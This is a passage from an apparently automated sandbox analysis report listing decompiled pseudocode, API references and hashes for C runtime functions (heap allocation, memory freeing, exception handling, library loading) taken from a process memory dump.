							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E01074D72(0);
				return _t35;
			}

0x0107729f
0x010772a6
0x010772ab
0x010772af
0x010772b6
0x010772bc
0x010772bc
0x010772c2
0x010772c4
0x010772c7
0x010772c7
0x010772ca
0x010772cc
0x010772d2
0x010772d6
0x010772db
0x010772df
0x010772e1
0x010772e4
0x010772ea
0x010772f1
0x010772f5
0x010772f9
0x010772fc
0x010772ff
0x010772ff
0x01077303
0x01077306
0x010772b8
0x010772b8
0x010772b8
0x01077308
0x01077313

APIs

Part of subcall function 010754A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0107528C,00000001,00000364,00000005,000000FF,?,0107395D,01078335,?,01077007,?,00000000), ref: 010754EA

_free.LIBCMT ref: 01077308

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: f4a7d6c1b0f746b5d238b135762828af42d8407b0a65887c13d701e1e6a95ec1
Instruction ID: a4523eaeea8992218232d610e6f0a37dcfa1aa87daa18ed37ea35a12e5dfe39b
Opcode Fuzzy Hash: f4a7d6c1b0f746b5d238b135762828af42d8407b0a65887c13d701e1e6a95ec1
Instruction Fuzzy Hash: 5A014972A003166BC3228F98D8859DEFBD8EB053B0F00066DE595A76C0E770AC00C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 010754A9, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010754A9(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x10841c8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E01074A7A();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E01073958(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E01074AC5(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x010754af
0x010754b4
0x010754c2
0x010754c2
0x010754c8
0x010754ca
0x010754ca
0x010754e1
0x010754ea
0x010754f2
0x00000000
0x00000000
0x010754d2
0x010754d4
0x010754f6
0x010754fb
0x01075501
0x00000000
0x01075501
0x010754dd
0x010754df
0x00000000
0x00000000
0x010754df
0x00000000
0x010754e1
0x010754ba
0x010754c0
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0107528C,00000001,00000364,00000005,000000FF,?,0107395D,01078335,?,01077007,?,00000000), ref: 010754EA

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0555a7838d06913c3aea11065663b07ed67480ca9d4170399b72537c12dc4eaf
Instruction ID: d8b20c5e8204009617542e76fd6f2de484505869bc5293b831e52fcd5e6d2017
Opcode Fuzzy Hash: 0555a7838d06913c3aea11065663b07ed67480ca9d4170399b72537c12dc4eaf
Instruction Fuzzy Hash: C9F0BB31F4513677AB715B29DC00BDB7B98AF517A5B098151ADC8D61C0CE20D40147EC

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01077A0B, Relevance: 19.6, APIs: 13, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01077A0B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x10836f8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E01074D72(_t46);
							E01077528( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E01074D72(_t47);
							E01077626( *((intOrPtr*)(_t74 + 0x88)));
						}
						E01074D72( *((intOrPtr*)(_t74 + 0x7c)));
						E01074D72( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E01074D72( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E01074D72( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E01074D72( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E01074D72( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E01077B7C( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x1083648) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E01074D72(_t31);
							E01074D72( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E01074D72(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E01074D72(_t74);
			}

0x01077a13
0x01077a17
0x01077a1f
0x01077a28
0x01077a2d
0x01077a34
0x01077a3c
0x01077a44
0x01077a4f
0x01077a55
0x01077a56
0x01077a5e
0x01077a66
0x01077a71
0x01077a77
0x01077a7b
0x01077a86
0x01077a8c
0x01077a2d
0x01077a8d
0x01077a95
0x01077aa8
0x01077abb
0x01077ac9
0x01077ad4
0x01077ad9
0x01077ae2
0x01077aea
0x01077aeb
0x01077af1
0x01077af4
0x01077af7
0x01077afe
0x01077b00
0x01077b04
0x01077b0c
0x01077b13
0x01077b19
0x01077b1a
0x01077b1a
0x01077b21
0x01077b23
0x01077b28
0x01077b30
0x01077b35
0x01077b36
0x01077b36
0x01077b39
0x01077b3c
0x01077b3f
0x01077b42
0x01077b42
0x01077b52

APIs

___free_lconv_mon.LIBCMT ref: 01077A4F

Part of subcall function 01077528: _free.LIBCMT ref: 01077545
Part of subcall function 01077528: _free.LIBCMT ref: 01077557
Part of subcall function 01077528: _free.LIBCMT ref: 01077569
Part of subcall function 01077528: _free.LIBCMT ref: 0107757B
Part of subcall function 01077528: _free.LIBCMT ref: 0107758D
Part of subcall function 01077528: _free.LIBCMT ref: 0107759F
Part of subcall function 01077528: _free.LIBCMT ref: 010775B1
Part of subcall function 01077528: _free.LIBCMT ref: 010775C3
Part of subcall function 01077528: _free.LIBCMT ref: 010775D5
Part of subcall function 01077528: _free.LIBCMT ref: 010775E7
Part of subcall function 01077528: _free.LIBCMT ref: 010775F9
Part of subcall function 01077528: _free.LIBCMT ref: 0107760B
Part of subcall function 01077528: _free.LIBCMT ref: 0107761D

_free.LIBCMT ref: 01077A44

Part of subcall function 01074D72: HeapFree.KERNEL32(00000000,00000000,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?), ref: 01074D88
Part of subcall function 01074D72: GetLastError.KERNEL32(?,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?,?), ref: 01074D9A

_free.LIBCMT ref: 01077A66
_free.LIBCMT ref: 01077A7B
_free.LIBCMT ref: 01077A86
_free.LIBCMT ref: 01077AA8
_free.LIBCMT ref: 01077ABB
_free.LIBCMT ref: 01077AC9
_free.LIBCMT ref: 01077AD4
_free.LIBCMT ref: 01077B0C
_free.LIBCMT ref: 01077B13
_free.LIBCMT ref: 01077B30
_free.LIBCMT ref: 01077B48

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 15ec2507e639ef7e8fec78866669fbba27ff7d6bdfa08d2fb19861741e830c4f
Instruction ID: e4b3a96a7ad5b1f9c3974c595d9085c89ee05805a74f211f98931963f403c05f
Opcode Fuzzy Hash: 15ec2507e639ef7e8fec78866669fbba27ff7d6bdfa08d2fb19861741e830c4f
Instruction Fuzzy Hash: 5F314F31E00706AFEB62BA7CD848BA677E8EF50390F508459E2D5D7150EF30ED908B58

Uniqueness

Uniqueness Score: -1.00%

Function 01074FD2, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01074FD2(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x107df30;
				if(_t67 != 0x107df30) {
					E01074D72(_t67);
					_t36 = _a4;
				}
				E01074D72( *((intOrPtr*)(_t36 + 0x3c)));
				E01074D72( *((intOrPtr*)(_a4 + 0x30)));
				E01074D72( *((intOrPtr*)(_a4 + 0x34)));
				E01074D72( *((intOrPtr*)(_a4 + 0x38)));
				E01074D72( *((intOrPtr*)(_a4 + 0x28)));
				E01074D72( *((intOrPtr*)(_a4 + 0x2c)));
				E01074D72( *((intOrPtr*)(_a4 + 0x40)));
				E01074D72( *((intOrPtr*)(_a4 + 0x44)));
				E01074D72( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E01074DFE(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E01074E69(_t71, _t75);
			}

0x01074fd2
0x01074fd7
0x01074fdd
0x01074fdf
0x01074fe5
0x01074fe8
0x01074fed
0x01074ff0
0x01074ff4
0x01074fff
0x0107500a
0x01075015
0x01075020
0x0107502b
0x01075036
0x01075041
0x0107504f
0x0107505a
0x01075062
0x01075063
0x01075066
0x0107506c
0x01075070
0x01075074
0x01075075
0x0107507f
0x01075085
0x01075086
0x01075089
0x0107508f
0x01075093
0x01075097
0x0107509e

APIs

_free.LIBCMT ref: 01074FE8

Part of subcall function 01074D72: HeapFree.KERNEL32(00000000,00000000,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?), ref: 01074D88
Part of subcall function 01074D72: GetLastError.KERNEL32(?,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?,?), ref: 01074D9A

_free.LIBCMT ref: 01074FF4
_free.LIBCMT ref: 01074FFF
_free.LIBCMT ref: 0107500A
_free.LIBCMT ref: 01075015
_free.LIBCMT ref: 01075020
_free.LIBCMT ref: 0107502B
_free.LIBCMT ref: 01075036
_free.LIBCMT ref: 01075041
_free.LIBCMT ref: 0107504F

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3cb0dc65df8302449e1de9be8cf0cfc2fcabe0a3b6cbca0d7a3b93675ec5466c
Instruction ID: 610671f54b1dcd6a509fe207883d75cf8ab8c4cbdb7b89e9e5f662dfc29f99fe
Opcode Fuzzy Hash: 3cb0dc65df8302449e1de9be8cf0cfc2fcabe0a3b6cbca0d7a3b93675ec5466c
Instruction Fuzzy Hash: 09219476900549AFCB42EFA4C880DDE7BB9FF19340F0141A6B695DB120EB31EB44CB84

Uniqueness

Uniqueness Score: -1.00%

Function 01072910, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E01072910(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				void* __ebp;
				char _t53;
				signed int _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr* _t74;
				intOrPtr _t75;
				intOrPtr _t77;
				signed int _t80;
				char _t82;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t103;
				void* _t110;

				_t89 = __edx;
				_t74 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t74 = E0107C367(__ecx,  *_t74);
				_t75 = _a8;
				_t6 = _t75 + 0x10; // 0x11
				_t96 = _t6;
				_v20 = _t96;
				_v12 =  *(_t75 + 8) ^  *0x108300c;
				E010728D0(__edx, __edi, _t96,  *(_t75 + 8) ^  *0x108300c, _t96);
				E01072BCC(_a12);
				_t53 = _a4;
				_t103 = _t102 + 0x10;
				_t93 =  *((intOrPtr*)(_t75 + 0xc));
				if(( *(_t53 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E01072DEC(_t75, 0xfffffffe, _t96, 0x108300c);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t53;
					_v28 = _a12;
					 *((intOrPtr*)(_t75 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t80 = _v12;
							_t60 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t80 + _t60 * 4));
							_t61 = _t80 + _t60 * 4;
							_t81 =  *((intOrPtr*)(_t61 + 4));
							_v24 = _t61;
							if( *((intOrPtr*)(_t61 + 4)) == 0) {
								_t82 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t62 = E01072D9C(_t81, _t96);
								_t82 = 1;
								_v5 = 1;
								_t110 = _t62;
								if(_t110 < 0) {
									_v16 = 0;
									L13:
									E010728D0(_t89, _t93, _t96, _v12, _t96);
									goto L14;
								} else {
									if(_t110 > 0) {
										_t63 = _a4;
										__eflags =  *_t63 - 0xe06d7363;
										if( *_t63 == 0xe06d7363) {
											__eflags =  *0x107d308;
											if(__eflags != 0) {
												_t70 = E0107BB00(__eflags, 0x107d308);
												_t103 = _t103 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t98 =  *0x107d308; // 0x107209f
													 *0x107d170(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t103 = _t103 + 8;
												}
												_t63 = _a4;
											}
										}
										_t90 = _t63;
										E01072DD0(_t63, _a8, _t63);
										_t65 = _a8;
										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t65 + 0xc)) != _t93) {
											_t90 = _t93;
											E01072DEC(_t65, _t93, _t96, 0x108300c);
											_t65 = _a8;
										}
										 *((intOrPtr*)(_t65 + 0xc)) = _t77;
										E010728D0(_t90, _t93, _t96, _v16, _t96);
										E01072DB4();
										asm("int3");
										_t67 = _v40;
										__eflags = _t67;
										if(_t67 != 0) {
											__eflags = _t67 - 0x1083c6c;
											if(_t67 != 0x1083c6c) {
												return E010736D4(_t67);
											}
										}
										return _t67;
									} else {
										goto L7;
									}
								}
							}
							goto L26;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t82 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L26:
			}

0x01072910
0x01072917
0x0107291b
0x0107291c
0x01072922
0x0107292e
0x01072930
0x01072936
0x01072936
0x01072941
0x01072944
0x01072947
0x0107294f
0x01072954
0x01072957
0x0107295a
0x01072961
0x010729bd
0x010729c0
0x010729c8
0x010729cf
0x00000000
0x010729cf
0x00000000
0x01072963
0x01072963
0x01072969
0x0107296f
0x01072975
0x010729e0
0x010729e9
0x01072977
0x01072977
0x01072977
0x0107297d
0x01072980
0x01072983
0x01072986
0x01072989
0x0107298e
0x010729a4
0x00000000
0x01072990
0x01072990
0x01072992
0x01072997
0x01072999
0x0107299c
0x0107299e
0x010729b4
0x010729d4
0x010729d8
0x00000000
0x010729a0
0x010729a0
0x010729ea
0x010729ed
0x010729f3
0x010729f5
0x010729fc
0x01072a03
0x01072a08
0x01072a0b
0x01072a0d
0x01072a0f
0x01072a1c
0x01072a22
0x01072a24
0x01072a27
0x01072a27
0x01072a2a
0x01072a2a
0x010729fc
0x01072a30
0x01072a32
0x01072a37
0x01072a3a
0x01072a3d
0x01072a45
0x01072a49
0x01072a4e
0x01072a4e
0x01072a55
0x01072a58
0x01072a68
0x01072a6d
0x01072a71
0x01072a74
0x01072a76
0x01072a78
0x01072a7d
0x00000000
0x01072a85
0x01072a7d
0x01072a87
0x010729a2
0x00000000
0x010729a2
0x010729a0
0x0107299e
0x00000000
0x010729a7
0x010729a7
0x010729a9
0x010729b0
0x00000000
0x010729b2
0x00000000
0x010729b0
0x01072975
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 01072947
___except_validate_context_record.LIBVCRUNTIME ref: 0107294F
_ValidateLocalCookies.LIBCMT ref: 010729D8
__IsNonwritableInCurrentImage.LIBCMT ref: 01072A03
_ValidateLocalCookies.LIBCMT ref: 01072A58

Strings

csm, xrefs: 010729ED

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5efde259dd72071ce7dffd745e5ee110d7872ec38d9463ba360ce03593d0ec9f
Instruction ID: 0c225943c277b5b1ffd99f7f5228ec2b027a683d99aa4dda75c0837632f24155
Opcode Fuzzy Hash: 5efde259dd72071ce7dffd745e5ee110d7872ec38d9463ba360ce03593d0ec9f
Instruction Fuzzy Hash: 4A419030E00209ABCF10EF68C884AAEBFF5FF54364F188095E994AB352D731D941CB99

Uniqueness

Uniqueness Score: -1.00%

Function 01076470, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01076470(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x10840f0 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x107e0b8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E01074D38(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E01074D38(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x01076479
0x01076523
0x01076481
0x01076483
0x0107648a
0x0107648c
0x01076492
0x0107649f
0x010764b4
0x010764b8
0x0107650a
0x0107650a
0x0107650f
0x01076513
0x01076516
0x01076516
0x0107651c
0x0107651e
0x01076533
0x0107652e
0x01076532
0x01076532
0x01076520
0x01076520
0x00000000
0x01076520
0x010764ba
0x010764c3
0x010764fa
0x010764fa
0x010764fc
0x010764fe
0x00000000
0x00000000
0x01076506
0x00000000
0x01076506
0x010764cd
0x010764d2
0x010764d7
0x00000000
0x00000000
0x010764e1
0x010764e6
0x010764eb
0x00000000
0x00000000
0x010764f0
0x010764f6
0x00000000
0x010764f6
0x01076497
0x00000000
0x00000000
0x00000000
0x0107649d
0x0107652c
0x00000000

Strings

api-ms-, xrefs: 010764C7
ext-ms-, xrefs: 010764DB

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: e5dfcfa9fec51391754760db8ee5a5a205d0a3309ce2a0cee1118346fe0883fc
Instruction ID: 64b92e35922911c528709bdb8866c108d31d454ea40a3537b702d438e8f08861
Opcode Fuzzy Hash: e5dfcfa9fec51391754760db8ee5a5a205d0a3309ce2a0cee1118346fe0883fc
Instruction Fuzzy Hash: A7210B71E01611ABFB3296689C40B5E3B98AF017A0F150560FDC7B7185EA33DC008BE8

Uniqueness

Uniqueness Score: -1.00%

Function 010776C7, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010776C7(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0107768F(_t45, 7);
					E0107768F(_t45 + 0x1c, 7);
					E0107768F(_t45 + 0x38, 0xc);
					E0107768F(_t45 + 0x68, 0xc);
					E0107768F(_t45 + 0x98, 2);
					E01074D72( *((intOrPtr*)(_t45 + 0xa0)));
					E01074D72( *((intOrPtr*)(_t45 + 0xa4)));
					E01074D72( *((intOrPtr*)(_t45 + 0xa8)));
					E0107768F(_t45 + 0xb4, 7);
					E0107768F(_t45 + 0xd0, 7);
					E0107768F(_t45 + 0xec, 0xc);
					E0107768F(_t45 + 0x11c, 0xc);
					E0107768F(_t45 + 0x14c, 2);
					E01074D72( *((intOrPtr*)(_t45 + 0x154)));
					E01074D72( *((intOrPtr*)(_t45 + 0x158)));
					E01074D72( *((intOrPtr*)(_t45 + 0x15c)));
					return E01074D72( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x010776cd
0x010776d2
0x010776db
0x010776e6
0x010776f1
0x010776fc
0x0107770a
0x01077715
0x01077720
0x0107772b
0x01077739
0x01077747
0x01077758
0x01077766
0x01077774
0x0107777f
0x0107778a
0x01077795
0x00000000
0x010777a5
0x010777aa

APIs

Part of subcall function 0107768F: _free.LIBCMT ref: 010776B4

_free.LIBCMT ref: 01077715

Part of subcall function 01074D72: HeapFree.KERNEL32(00000000,00000000,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?), ref: 01074D88
Part of subcall function 01074D72: GetLastError.KERNEL32(?,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?,?), ref: 01074D9A

_free.LIBCMT ref: 01077720
_free.LIBCMT ref: 0107772B
_free.LIBCMT ref: 0107777F
_free.LIBCMT ref: 0107778A
_free.LIBCMT ref: 01077795
_free.LIBCMT ref: 010777A0

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b70f8fe2e3e57d9ce416f35a547a0632654724d11a49428304fbecbc8e1b03b0
Instruction ID: 9992ae9a883ebe143c1936abdf8e6b73f2a54aa21e52299521ae67d62ca18d0f
Opcode Fuzzy Hash: b70f8fe2e3e57d9ce416f35a547a0632654724d11a49428304fbecbc8e1b03b0
Instruction Fuzzy Hash: F5119071D40B05BBD631BBB4CC09FDB779CAF28780F414824A3D9A6050EB34B9448759

Uniqueness

Uniqueness Score: -1.00%

Function 01078BFD, Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E01078BFD(void* __ebx, void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed char _t252;
				signed int _t253;
				signed char _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				signed char _t263;
				void* _t264;
				void* _t266;
				long _t268;
				signed int _t271;
				long _t272;
				struct _OVERLAPPED* _t273;
				signed int _t274;
				intOrPtr _t276;
				signed int _t278;
				signed int _t281;
				long _t282;
				long _t283;
				signed char _t284;
				intOrPtr _t285;
				signed int _t286;
				void* _t287;
				void* _t288;

				_t172 =  *0x108300c; // 0x98fa3f37
				_v8 = _t172 ^ _t286;
				_t174 = _a8;
				_t263 = _a12;
				_t274 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_v80 = _t274;
				_t276 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t274 +  *((intOrPtr*)(0x10841d0 + _t246 * 4)) + 0x18));
				_v104 = _t276;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E01074C38( &_v72, _t263, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t268 = _v112;
				_v40 = _t268;
				if(_t268 >= _t276) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t278 = _v92;
					while(1) {
						_v47 =  *_t268;
						_v76 = _t243;
						_v44 = 1;
